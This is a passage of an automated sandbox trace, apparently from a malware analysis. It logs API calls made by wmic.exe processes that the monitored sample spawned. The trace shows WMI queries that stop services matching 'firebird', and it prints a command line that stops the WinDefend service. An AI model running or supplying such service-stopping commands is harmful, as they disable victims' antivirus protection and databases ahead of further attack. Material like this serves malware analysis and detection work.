(lpString="stopservice") returned 11 [0249.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0249.662] IUnknown:Release (This=0x1edc4a0) returned 0x0 [0249.662] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="UserControlService", ppInSignature=0x28d540*=0x1edc520, ppOutSignature=0x28d548*=0x1edca20) returned 0x0 [0249.662] lstrlenW (lpString="UserControlService") returned 18 [0249.662] lstrlenW (lpString="stopservice") returned 11 [0249.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0249.662] IUnknown:Release (This=0x1edc520) returned 0x0 [0249.662] IUnknown:Release (This=0x1edca20) returned 0x0 [0249.662] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="Create", ppInSignature=0x28d540*=0x1ede470, ppOutSignature=0x28d548*=0x1ede970) returned 0x0 [0249.663] lstrlenW (lpString="Create") returned 6 [0249.663] lstrlenW (lpString="stopservice") returned 11 [0249.663] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0249.663] IUnknown:Release (This=0x1ede470) returned 0x0 [0249.663] IUnknown:Release (This=0x1ede970) returned 0x0 [0249.663] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="Change", ppInSignature=0x28d540*=0x1ede1f0, ppOutSignature=0x28d548*=0x1ede6f0) returned 0x0 [0249.663] lstrlenW (lpString="Change") returned 6 [0249.663] lstrlenW (lpString="stopservice") returned 11 [0249.663] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0249.663] IUnknown:Release (This=0x1ede1f0) returned 0x0 [0249.663] IUnknown:Release (This=0x1ede6f0) returned 0x0 [0249.663] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="ChangeStartMode", ppInSignature=0x28d540*=0x1edc610, ppOutSignature=0x28d548*=0x1edcb10) returned 0x0 [0249.663] lstrlenW (lpString="ChangeStartMode") returned 15 [0249.663] lstrlenW (lpString="stopservice") returned 11 [0249.663] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0249.663] IUnknown:Release (This=0x1edc610) returned 0x0 [0249.663] IUnknown:Release (This=0x1edcb10) returned 0x0 [0249.663] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="Delete", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc4a0) returned 0x0 [0249.664] lstrlenW (lpString="Delete") returned 6 [0249.664] lstrlenW (lpString="stopservice") returned 11 [0249.664] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0249.664] IUnknown:Release (This=0x1edc4a0) returned 0x0 [0249.664] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="GetSecurityDescriptor", ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x1edc640) returned 0x0 [0249.664] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0249.664] lstrlenW (lpString="stopservice") returned 11 [0249.664] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0249.664] IUnknown:Release (This=0x1edc640) returned 0x0 [0249.664] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*="SetSecurityDescriptor", ppInSignature=0x28d540*=0x1edc520, ppOutSignature=0x28d548*=0x1edca20) returned 0x0 [0249.664] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0249.664] lstrlenW (lpString="stopservice") returned 11 [0249.664] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0249.664] IUnknown:Release (This=0x1edc520) returned 0x0 [0249.664] IUnknown:Release (This=0x1edca20) returned 0x0 [0249.664] IWbemClassObject:NextMethod (in: This=0x1edbfa0, lFlags=0, pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0 | out: pstrName=0x28d538*=0x0, ppInSignature=0x28d540*=0x0, ppOutSignature=0x28d548*=0x0) returned 0x40005 [0249.664] IUnknown:Release (This=0x1edbfa0) returned 0x0 [0249.664] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.664] lstrlenW (lpString="SET") returned 3 [0249.664] lstrlenW (lpString="call") returned 4 [0249.664] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0249.664] lstrlenW (lpString="CREATE") returned 6 [0249.664] lstrlenW (lpString="call") returned 4 [0249.664] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0249.665] free (_Block=0x358640) [0249.665] malloc (_Size=0x8) returned 0x35cf60 [0249.665] lstrlenW (lpString="GET") returned 3 [0249.665] lstrlenW (lpString="call") returned 4 [0249.665] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0249.665] lstrlenW (lpString="LIST") returned 4 [0249.665] lstrlenW (lpString="call") returned 4 [0249.665] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0249.665] lstrlenW (lpString="ASSOC") returned 5 [0249.665] lstrlenW (lpString="call") returned 4 [0249.665] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0249.665] WbemLocator:IUnknown:AddRef (This=0x1ea1390) returned 0x3 [0249.665] free (_Block=0x356a50) [0249.665] lstrlenW (lpString="") returned 0 [0249.665] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.665] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0249.665] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.665] malloc (_Size=0x14) returned 0x35cc80 [0249.665] lstrlenW (lpString="XDUWTFONO") returned 9 [0249.665] GetCurrentThreadId () returned 0x2ac [0249.665] GetCurrentProcess () returned 0xffffffffffffffff [0249.665] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x28f880 | out: TokenHandle=0x28f880*=0x298) returned 1 [0249.665] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28f878 | out: TokenInformation=0x0, ReturnLength=0x28f878) returned 0 [0249.666] malloc (_Size=0x118) returned 0x35cf80 [0249.666] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x35cf80, TokenInformationLength=0x118, ReturnLength=0x28f878 | out: TokenInformation=0x35cf80, ReturnLength=0x28f878) returned 1 [0249.666] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x35cf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=108439384, Attributes=0xd131), (Luid.LowPart=0x0, Luid.HighPart=3500624, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=3473752, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000d12c), (Luid.LowPart=0x0, Luid.HighPart=3526496, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0249.666] free (_Block=0x35cf80) [0249.666] CloseHandle (hObject=0x298) returned 1 [0249.666] lstrlenW (lpString="GET") returned 3 [0249.666] lstrlenW (lpString="call") returned 4 [0249.666] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0249.666] lstrlenW (lpString="LIST") returned 4 [0249.666] lstrlenW (lpString="call") returned 4 [0249.666] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0249.666] lstrlenW (lpString="SET") returned 3 [0249.666] lstrlenW (lpString="call") returned 4 [0249.666] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0249.666] lstrlenW (lpString="CALL") returned 4 [0249.666] lstrlenW (lpString="call") returned 4 [0249.666] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0249.666] ??0CHString@@QEAA@XZ () returned 0x28f830 [0249.666] GetCurrentThreadId () returned 0x2ac [0249.666] malloc (_Size=0x18) returned 0x35cca0 [0249.667] malloc (_Size=0x18) returned 0x35ccc0 [0249.667] malloc (_Size=0x18) returned 0x35cce0 [0249.667] malloc (_Size=0x18) returned 0x35cd00 [0249.667] malloc (_Size=0x18) returned 0x35d550 [0249.667] SysStringLen (param_1="\\\\") returned 0x2 [0249.667] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0249.667] malloc (_Size=0x18) returned 0x35d570 [0249.667] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0249.667] SysStringLen (param_1="\\") returned 0x1 [0249.667] malloc (_Size=0x18) returned 0x35d590 [0249.667] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0249.667] SysStringLen (param_1="root\\cimv2") returned 0xa [0249.667] free (_Block=0x35d570) [0249.667] free (_Block=0x35d550) [0249.668] free (_Block=0x35cd00) [0249.668] free (_Block=0x35cce0) [0249.668] free (_Block=0x35ccc0) [0249.668] free (_Block=0x35cca0) [0249.668] malloc (_Size=0x18) returned 0x35cca0 [0249.668] malloc (_Size=0x18) returned 0x35ccc0 [0249.668] malloc (_Size=0x18) returned 0x35cce0 [0249.668] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1ea1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffdb29d0 | out: ppNamespace=0xffdb29d0*=0x1eb3b28) returned 0x0 [0249.673] free (_Block=0x35cce0) [0249.673] free (_Block=0x35ccc0) [0249.673] free (_Block=0x35cca0) [0249.673] CoSetProxyBlanket (pProxy=0x1eb3b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0249.674] free (_Block=0x35d590) [0249.674] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0249.674] ??0CHString@@QEAA@XZ () returned 0x28f5d8 [0249.674] GetCurrentThreadId () returned 0x2ac [0249.674] malloc (_Size=0x70) returned 0x35cf80 [0249.674] malloc (_Size=0x50) returned 0x35d000 [0249.674] malloc (_Size=0x50) returned 0x35d060 [0249.674] malloc (_Size=0x70) returned 0x35d0c0 [0249.674] malloc (_Size=0x70) returned 0x35d140 [0249.674] malloc (_Size=0x48) returned 0x35d1c0 [0249.674] malloc (_Size=0x18) returned 0x35cca0 [0249.674] lstrlenA (lpString="") returned 0 [0249.674] malloc (_Size=0x2) returned 0x356a50 [0249.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffd4314c, cbMultiByte=-1, lpWideCharStr=0x356a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0249.674] free (_Block=0x356a50) [0249.674] malloc (_Size=0x70) returned 0x35d210 [0249.674] malloc (_Size=0x48) returned 0x35d290 [0249.674] malloc (_Size=0x18) returned 0x35ccc0 [0249.674] free (_Block=0x35cca0) [0249.674] IWbemServices:GetObject (in: This=0x1eb3b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x28f608*=0x0, ppCallResult=0x0 | out: ppObject=0x28f608*=0x1edc030, ppCallResult=0x0) returned 0x0 [0249.692] malloc (_Size=0x18) returned 0x35cca0 [0249.692] IWbemClassObject:GetMethod (in: This=0x1edc030, wszName="stopservice", lFlags=0, ppInSignature=0x28f600, ppOutSignature=0x28f618 | out: ppInSignature=0x28f600*=0x0, ppOutSignature=0x28f618*=0x1edc530) returned 0x0 [0249.692] free (_Block=0x35cca0) [0249.692] IUnknown:Release (This=0x1edc530) returned 0x0 [0249.692] IUnknown:Release (This=0x1edc030) returned 0x0 [0249.692] ??0CHString@@QEAA@XZ () returned 0x28f420 [0249.692] GetCurrentThreadId () returned 0x2ac [0249.692] malloc (_Size=0x18) returned 0x35cca0 [0249.692] lstrlenA (lpString="") returned 0 [0249.692] malloc (_Size=0x2) returned 0x356a50 [0249.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffd4314c, cbMultiByte=-1, lpWideCharStr=0x356a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0249.692] free (_Block=0x356a50) [0249.692] malloc (_Size=0x18) returned 0x35cce0 [0249.693] lstrlenA (lpString="") returned 0 [0249.693] malloc (_Size=0x2) returned 0x356a50 [0249.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffd4314c, cbMultiByte=-1, lpWideCharStr=0x356a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0249.693] free (_Block=0x356a50) [0249.693] malloc (_Size=0x18) returned 0x35cd00 [0249.693] free (_Block=0x35cce0) [0249.693] malloc (_Size=0x18) returned 0x35cce0 [0249.693] lstrlenA (lpString="SELECT * FROM ") returned 14 [0249.693] malloc (_Size=0x1e) returned 0x35d2e0 [0249.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffd44a40, cbMultiByte=-1, lpWideCharStr=0x35d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0249.693] free (_Block=0x35d2e0) [0249.693] malloc (_Size=0x18) returned 0x35d550 [0249.693] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0249.693] SysStringLen (param_1="Win32_Service") returned 0xd [0249.693] free (_Block=0x35cce0) [0249.693] malloc (_Size=0x18) returned 0x35cce0 [0249.693] malloc (_Size=0x18) returned 0x35d570 [0249.694] lstrlenA (lpString=" WHERE ") returned 7 [0249.694] malloc (_Size=0x10) returned 0x35d590 [0249.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffd43e20, cbMultiByte=-1, lpWideCharStr=0x35d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0249.694] free (_Block=0x35d590) [0249.694] malloc (_Size=0x18) returned 0x35d590 [0249.694] SysStringLen (param_1=" WHERE ") returned 0x7 [0249.694] SysStringLen (param_1="name like '%%firebird%%'") returned 0x18 [0249.694] malloc (_Size=0x18) returned 0x35d5b0 [0249.694] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0249.694] SysStringLen (param_1=" WHERE name like '%%firebird%%'") returned 0x1f [0249.694] free (_Block=0x35d550) [0249.694] free (_Block=0x35d590) [0249.694] free (_Block=0x35d570) [0249.694] free (_Block=0x35cce0) [0249.694] malloc (_Size=0x18) returned 0x35cce0 [0249.695] IWbemServices:ExecQuery (in: This=0x1eb3b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%firebird%%'", lFlags=48, pCtx=0x0, ppEnum=0x28f408 | out: ppEnum=0x28f408*=0x1eb3c28) returned 0x0 [0249.702] free (_Block=0x35cce0) [0249.702] CoSetProxyBlanket (pProxy=0x1eb3c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0249.704] IEnumWbemClassObject:Next (in: This=0x1eb3c28, lTimeout=-1, uCount=0x1, apObjects=0x28f410, puReturned=0x28f598 | out: apObjects=0x28f410*=0x0, puReturned=0x28f598*=0x0) returned 0x1 [0250.109] IUnknown:Release (This=0x1eb3c28) returned 0x0 [0250.110] free (_Block=0x35d5b0) [0250.110] free (_Block=0x35cd00) [0250.110] free (_Block=0x35cca0) [0250.110] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.110] free (_Block=0x35ccc0) [0250.110] free (_Block=0x35d1c0) [0250.110] free (_Block=0x35d140) [0250.110] free (_Block=0x35d0c0) [0250.111] free (_Block=0x35d060) [0250.111] free (_Block=0x35d000) [0250.111] free (_Block=0x35d290) [0250.111] free (_Block=0x35d210) [0250.111] free (_Block=0x35cf80) [0250.111] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.111] GetCurrentThreadId () returned 0x2ac [0250.111] ??0CHString@@QEAA@PEBG@Z () returned 0x28f928 [0250.111] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x28f928 [0250.111] malloc (_Size=0x800) returned 0x35dd20 [0250.111] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x35dd20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0250.112] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0250.112] malloc (_Size=0x1c) returned 0x35cf80 [0250.112] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x35cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0250.112] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0250.112] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0250.112] free (_Block=0x35cf80) [0250.112] free (_Block=0x35dd20) [0250.112] ??1CHString@@QEAA@XZ () returned 0x2b76a701 [0250.112] WbemLocator:IUnknown:Release (This=0x1eb3b28) returned 0x0 [0250.113] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0250.113] _kbhit () returned 0x0 [0250.114] free (_Block=0x35cf60) [0250.114] free (_Block=0x35cb00) [0250.114] free (_Block=0x35cae0) [0250.114] free (_Block=0x35cac0) [0250.114] free (_Block=0x35caa0) [0250.115] free (_Block=0x35cdc0) [0250.115] free (_Block=0x357140) [0250.115] free (_Block=0x35cf00) [0250.115] free (_Block=0x358680) [0250.115] free (_Block=0x35cba0) [0250.115] free (_Block=0x35cbc0) [0250.115] free (_Block=0x356ea0) [0250.115] free (_Block=0x35d4d0) [0250.115] free (_Block=0x35cbe0) [0250.115] free (_Block=0x35cc40) [0250.115] free (_Block=0x35d450) [0250.115] free (_Block=0x35d3d0) [0250.115] free (_Block=0x35cc20) [0250.115] free (_Block=0x35cc00) [0250.115] free (_Block=0x35cc60) [0250.115] free (_Block=0x35d370) [0250.115] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0250.115] free (_Block=0x35ce60) [0250.115] free (_Block=0x35cb40) [0250.115] free (_Block=0x35cf30) [0250.116] free (_Block=0x35cb80) [0250.116] free (_Block=0x358600) [0250.116] free (_Block=0x35cb60) [0250.116] free (_Block=0x35cb20) [0250.116] free (_Block=0x357f70) [0250.116] free (_Block=0x356980) [0250.116] free (_Block=0x3569d0) [0250.116] free (_Block=0x35cc80) [0250.116] free (_Block=0x356ac0) [0250.116] free (_Block=0x356e80) [0250.116] free (_Block=0x358040) [0250.116] free (_Block=0x356e60) [0250.116] free (_Block=0x358000) [0250.116] free (_Block=0x356e00) [0250.116] free (_Block=0x356e20) [0250.116] free (_Block=0x356ce0) [0250.116] free (_Block=0x356d00) [0250.116] free (_Block=0x356c80) [0250.116] free (_Block=0x356ca0) [0250.116] free (_Block=0x356d40) [0250.116] free (_Block=0x356d60) [0250.116] free (_Block=0x356da0) [0250.116] free (_Block=0x356dc0) [0250.117] free (_Block=0x356bc0) [0250.117] free (_Block=0x356be0) [0250.117] free (_Block=0x356b60) [0250.117] free (_Block=0x356b80) [0250.117] free (_Block=0x356c20) [0250.117] free (_Block=0x356c40) [0250.117] free (_Block=0x356b00) [0250.117] free (_Block=0x356b20) [0250.117] free (_Block=0x356a70) [0250.117] free (_Block=0x356a20) [0250.117] free (_Block=0x35cd30) [0250.117] WbemLocator:IUnknown:Release (This=0x1ea1390) returned 0x2 [0250.117] WbemLocator:IUnknown:Release (This=0x1eb3a98) returned 0x0 [0250.117] WbemLocator:IUnknown:Release (This=0x1ea1390) returned 0x1 [0250.117] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0250.118] WbemLocator:IUnknown:Release (This=0x1ea1390) returned 0x0 [0250.118] free (_Block=0x35ca20) [0250.118] free (_Block=0x35ca40) [0250.118] free (_Block=0x358540) [0250.118] free (_Block=0x35ca60) [0250.118] free (_Block=0x35ca80) [0250.118] free (_Block=0x358580) [0250.118] free (_Block=0x35c8a0) [0250.118] free (_Block=0x35c8c0) [0250.118] free (_Block=0x3583c0) [0250.118] free (_Block=0x35c8e0) [0250.118] free (_Block=0x35c900) [0250.118] free (_Block=0x358400) [0250.118] free (_Block=0x35c820) [0250.118] free (_Block=0x35c840) [0250.118] free (_Block=0x358340) [0250.118] free (_Block=0x35c860) [0250.119] free (_Block=0x35c880) [0250.119] free (_Block=0x358380) [0250.119] free (_Block=0x35c9a0) [0250.119] free (_Block=0x35c9c0) [0250.119] free (_Block=0x3584c0) [0250.119] free (_Block=0x35c9e0) [0250.119] free (_Block=0x35ca00) [0250.119] free (_Block=0x358500) [0250.119] free (_Block=0x35c7a0) [0250.119] free (_Block=0x35c7c0) [0250.119] free (_Block=0x3582c0) [0250.119] free (_Block=0x35c7e0) [0250.119] free (_Block=0x35c800) [0250.119] free (_Block=0x358300) [0250.119] free (_Block=0x35c920) [0250.119] free (_Block=0x35c940) [0250.119] free (_Block=0x358440) [0250.119] free (_Block=0x35c960) [0250.120] free (_Block=0x35c980) [0250.120] free (_Block=0x358480) [0250.120] free (_Block=0x35c6e0) [0250.120] free (_Block=0x35c700) [0250.120] free (_Block=0x358200) [0250.120] free (_Block=0x35c5a0) [0250.120] free (_Block=0x35c5c0) [0250.120] free (_Block=0x3580c0) [0250.120] free (_Block=0x35c560) [0250.120] free (_Block=0x35c580) [0250.120] free (_Block=0x358080) [0250.120] free (_Block=0x35c620) [0250.120] free (_Block=0x35c640) [0250.120] free (_Block=0x358140) [0250.121] free (_Block=0x35c720) [0250.121] free (_Block=0x35c740) [0250.121] free (_Block=0x358240) [0250.121] free (_Block=0x35c5e0) [0250.121] free (_Block=0x35c600) [0250.121] free (_Block=0x358100) [0250.121] free (_Block=0x35c660) [0250.121] free (_Block=0x35c680) [0250.121] free (_Block=0x358180) [0250.121] free (_Block=0x35c6a0) [0250.121] free (_Block=0x35c6c0) [0250.121] free (_Block=0x3581c0) [0250.121] free (_Block=0x35c760) [0250.121] free (_Block=0x35c780) [0250.121] free (_Block=0x358280) [0250.122] CoUninitialize () [0250.164] exit (_Code=0) [0250.165] free (_Block=0x356ef0) [0250.165] free (_Block=0x357f30) [0250.165] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.165] free (_Block=0x356fe0) [0250.165] free (_Block=0x356ae0) [0250.165] free (_Block=0x357ef0) [0250.165] free (_Block=0x357eb0) [0250.165] free (_Block=0x357e60) [0250.165] free (_Block=0x357e20) [0250.165] free (_Block=0x355ac0) [0250.165] free (_Block=0x357da0) [0250.165] free (_Block=0x355a80) [0250.165] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0250.165] free (_Block=0x3585c0) Thread: id = 189 os_tid = 0xa4c Thread: id = 190 os_tid = 0x30c Thread: id = 191 os_tid = 0x5f4 Thread: id = 192 os_tid = 0x990 Thread: id = 193 os_tid = 0xcc Process: id = "23" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x60393000" os_pid = "0xd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%WinDefend%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 195 os_tid = 0xdc [0250.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f830 | out: lpSystemTimeAsFileTime=0x26f830*(dwLowDateTime=0xaae932a0, dwHighDateTime=0x1d61d49)) [0250.355] GetCurrentProcessId () returned 0xd8 [0250.355] GetCurrentThreadId () returned 0xdc [0250.355] GetTickCount () returned 0x1168576 [0250.355] QueryPerformanceCounter (in: lpPerformanceCount=0x26f838 | out: lpPerformanceCount=0x26f838*=37052839892) returned 1 [0250.361] GetModuleHandleW (lpModuleName=0x0) returned 0xffe40000 [0250.361] __set_app_type (_Type=0x1) [0250.361] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe8ced0) returned 0x0 [0250.362] __wgetmainargs (in: _Argc=0xffeb2380, _Argv=0xffeb2390, _Env=0xffeb2388, _DoWildCard=0, _StartInfo=0xffeb239c | out: _Argc=0xffeb2380, _Argv=0xffeb2390, _Env=0xffeb2388) returned 0 [0250.362] ??0CHString@@QEAA@XZ () returned 0xffeb2ab0 [0250.363] malloc (_Size=0x30) returned 0x615a80 [0250.363] malloc (_Size=0x70) returned 0x617db0 [0250.363] malloc (_Size=0x50) returned 0x615ac0 [0250.363] malloc (_Size=0x30) returned 0x617e30 [0250.363] malloc (_Size=0x48) returned 0x617e70 [0250.363] malloc (_Size=0x30) returned 0x617ec0 [0250.363] malloc (_Size=0x30) returned 0x617f00 [0250.363] ??0CHString@@QEAA@XZ () returned 0xffeb2f58 [0250.363] malloc (_Size=0x30) returned 0x617f40 [0250.363] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0250.363] SetConsoleCtrlHandler (HandlerRoutine=0xffe85724, Add=1) returned 1 [0250.363] _onexit (_Func=0xffe9f378) returned 0xffe9f378 [0250.363] _onexit (_Func=0xffe9f490) returned 0xffe9f490 [0250.363] _onexit (_Func=0xffe9f4d0) returned 0xffe9f4d0 [0250.364] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 